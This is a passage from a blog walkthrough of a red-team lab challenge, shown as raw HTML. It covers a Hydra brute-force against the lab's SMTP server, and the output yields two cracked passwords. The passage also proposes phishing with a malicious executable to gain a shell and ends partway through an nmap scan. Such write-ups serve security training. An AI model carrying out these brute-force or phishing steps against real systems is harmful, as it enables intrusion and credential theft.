#89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> http:\/\/mail.thereserve.loc\/vendor\/<\/span><span style=\"color: #89DDFF\">]<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"15-roundcube-webmail-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color 
has-luminous-vivid-amber-color\">RoundCube Webmail <\/mark><\/h5>\n\n\n\n<p><a href=\"https:\/\/github.com\/roundcube\/roundcubemail\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Roundcube Webmail<\/a> is a browser-based multilingual IMAP client with an application-like user interface. It provides the full functionality you expect from an email client, including MIME support, address book, folder management, message searching, and spell checking. Roundcube Webmail is written in PHP and requires the MySQL, PostgreSQL, or SQLite database. With its plugin API, it is easily extendable and the user interface is fully customizable using skins.<\/p>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09105a3a&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09105a3a\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"515\" data-attachment-id=\"461\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206101226\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206101226.png?fit=1286%2C647&amp;ssl=1\" data-orig-size=\"1286,647\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206101226\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206101226.png?fit=1024%2C515&amp;ssl=1\" 
data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206101226.png?resize=1024%2C515&#038;ssl=1\" alt=\"\" class=\"wp-image-461\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206101226.png?resize=1024%2C515&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206101226.png?resize=300%2C151&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206101226.png?resize=768%2C386&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206101226.png?w=1286&amp;ssl=1 1286w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We only have potential usernames for the login, so we cannot log in. 
We can try to brute-force the SMTP port using <code>Hydra<\/code> and might be able to find matching passwords for the users.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"16-smtp-brute-force-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">SMTP Brute-Force<\/mark><\/h4>\n\n\n\n<p>For this brute-force attack, we will use the password list provided to us under lab resources.<\/p>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">hydra<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-L<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">emails.txt<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-P<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">passwords.lst<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mail.thereserve.loc<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">smtp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Hydra<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">v9.5<\/span><span style=\"color: #BABED8\"> (c) 2023 by van Hauser\/THC <\/span><span style=\"color: #89DDFF\">&amp;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">David<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Maciejak<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Please<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">do<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">use<\/span><span style=\"color: #BABED8\"> <\/span><span 
style=\"color: #C3E88D\">in<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">military<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">or<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">secret<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">service<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">organizations,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">or<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">illegal<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">purposes<\/span><span style=\"color: #BABED8\"> (this <\/span><span style=\"color: #C3E88D\">is<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">non-binding,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">these<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #BABED8\">***<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ignore<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">laws<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">and<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ethics<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">anyway<\/span><span style=\"color: #BABED8\">).<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Hydra<\/span><span style=\"color: #BABED8\"> (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-02-06 11:13:28<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">INFO<\/span><span style=\"color: #89DDFF\">]<\/span><span 
style=\"color: #BABED8\"> several providers have implemented cracking protection, check with a small wordlist first - and stay legal<\/span><span style=\"color: #89DDFF\">!<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">WARNING<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Restorefile <\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">you<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">have<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">seconds<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">abort...<\/span><span style=\"color: #BABED8\"> (use <\/span><span style=\"color: #C3E88D\">option<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-I<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">skip<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">waiting<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">) from a previous session found, to prevent overwriting, .\/hydra.restore<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">DATA<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> max 16 tasks per 1 server, overall 16 tasks, 15120 login tries <\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">l:18\/p:840<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">, <\/span><span style=\"color: #89DDFF\">~<\/span><span style=\"color: #BABED8\">945 tries per 
task<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">DATA<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> attacking smtp:\/\/mail.thereserve.loc:25\/<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">STATUS<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> 1004.00 tries\/min, 1004 tries <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:01h, 14116 to <\/span><span style=\"color: #89DDFF; font-style: italic\">do<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:15h, 16 active<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">STATUS<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> 1023.33 tries\/min, 3070 tries <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:03h, 12050 to <\/span><span style=\"color: #89DDFF; font-style: italic\">do<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:12h, 16 active<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">STATUS<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> 1034.14 tries\/min, 7239 tries <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:07h, 7881 to <\/span><span style=\"color: #89DDFF; font-style: italic\">do<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:08h, 16 active<\/span><\/span>\n<span class=\"line\"><span style=\"color: 
#89DDFF\">[<\/span><span style=\"color: #F78C6C\">25<\/span><span style=\"color: #89DDFF\">][<\/span><span style=\"color: #BABED8\">smtp<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> host: mail.thereserve.loc   login: laura.wood@corp.thereserve.loc   password: Password1@<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #F78C6C\">25<\/span><span style=\"color: #89DDFF\">][<\/span><span style=\"color: #BABED8\">smtp<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> host: mail.thereserve.loc   login: mohammad.ahmed@corp.thereserve.loc   password: Password1<\/span><span style=\"color: #89DDFF\">!<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">STATUS<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> 1114.75 tries\/min, 13377 tries <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:12h, 1743 to <\/span><span style=\"color: #89DDFF; font-style: italic\">do<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:02h, 16 active<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">STATUS<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> 1107.85 tries\/min, 14402 tries <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:13h, 718 to <\/span><span style=\"color: #89DDFF; font-style: italic\">do<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> 00:01h, 16 active<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#C3E88D\">of<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">target<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">successfully<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">completed,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">passwords<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">found<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Hydra<\/span><span style=\"color: #BABED8\"> (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-02-06 11:27:17<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09106146&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09106146\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"421\" data-attachment-id=\"462\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206112906\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206112906.png?fit=1685%2C692&amp;ssl=1\" data-orig-size=\"1685,692\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206112906\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206112906.png?fit=1024%2C421&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206112906.png?resize=1024%2C421&#038;ssl=1\" alt=\"\" class=\"wp-image-462\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206112906.png?resize=1024%2C421&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206112906.png?resize=300%2C123&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206112906.png?resize=768%2C315&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206112906.png?resize=1536%2C631&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206112906.png?w=1685&amp;ssl=1 1685w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
\/><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Luckily, we found two sets of credentials! We can use them now and try logging in to the Webmail app. Oftentimes, getting access to user mailboxes can be very useful as there are high chances of finding sensitive information in them.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"587\" data-attachment-id=\"463\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206111805\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111805.png?fit=2179%2C1249&amp;ssl=1\" data-orig-size=\"2179,1249\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206111805\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111805.png?fit=1024%2C587&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111805.png?resize=1024%2C587&#038;ssl=1\" alt=\"\" class=\"wp-image-463\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111805.png?resize=1024%2C587&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111805.png?resize=300%2C172&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111805.png?resize=768%2C440&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111805.png?resize=1536%2C880&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111805.png?resize=2048%2C1174&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"660\" data-attachment-id=\"464\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206111930\/\" 
data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111930.png?fit=1918%2C1236&amp;ssl=1\" data-orig-size=\"1918,1236\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206111930\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111930.png?fit=1024%2C660&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111930.png?resize=1024%2C660&#038;ssl=1\" alt=\"\" class=\"wp-image-464\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111930.png?resize=1024%2C660&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111930.png?resize=300%2C193&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111930.png?resize=768%2C495&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111930.png?resize=1536%2C990&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111930.png?w=1918&amp;ssl=1 1918w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Unfortunately, both user inboxes are empty. 
We can still make use of this access to carry out further attacks such as Phishing. We can send Phishing emails to steal sensitive information from other users such as their credentials. We can also try to catch a shell on their machine by weaponizing the Phishing email with a malicious executable payload. When the user clicks on the malicious file, we get a shell on the machine.<\/p>\n\n\n\n<p>For now, we will move on to enumerate other machines and come back to Phishing if we can&#8217;t find a way to get a foothold on the network.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"17-vpn-machine-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">VPN Machine<\/mark><\/h3>\n\n\n\n<p>Of the three hosts with potential entry points to the network, we have enumerated and gathered information from the WEB and MAIL machines. We will now run an NMAP scan on the VPN machine to identify its open ports and running services.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"18-nmap-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">NMAP<\/mark><\/h4>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" 
stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><pre class=\"shiki material-theme-ocean\" 
style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone\/VPN<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-p-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">vpn.thereserve.loc<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-A<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap\/vpn-fullscan<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Starting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">7.94<\/span><span style=\"color: #C3E88D\">SVN<\/span><span style=\"color: #BABED8\"> ( <\/span><span style=\"color: #C3E88D\">https:\/\/nmap.org<\/span><span style=\"color: #BABED8\"> ) at 2024-02-06 11:58 CST<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Unable<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">split<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">netmask<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">from<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">target<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">expression:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span 
style=\"color: #C3E88D\">nmap\/vpn-fullscan<\/span><span style=\"color: #89DDFF\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">scan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">report<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">vpn.thereserve.loc<\/span><span style=\"color: #BABED8\"> (10.200.113.12)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Host<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">is<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">up<\/span><span style=\"color: #BABED8\"> (0.20s <\/span><span style=\"color: #C3E88D\">latency<\/span><span style=\"color: #BABED8\">).<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">shown:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">65525<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">closed<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 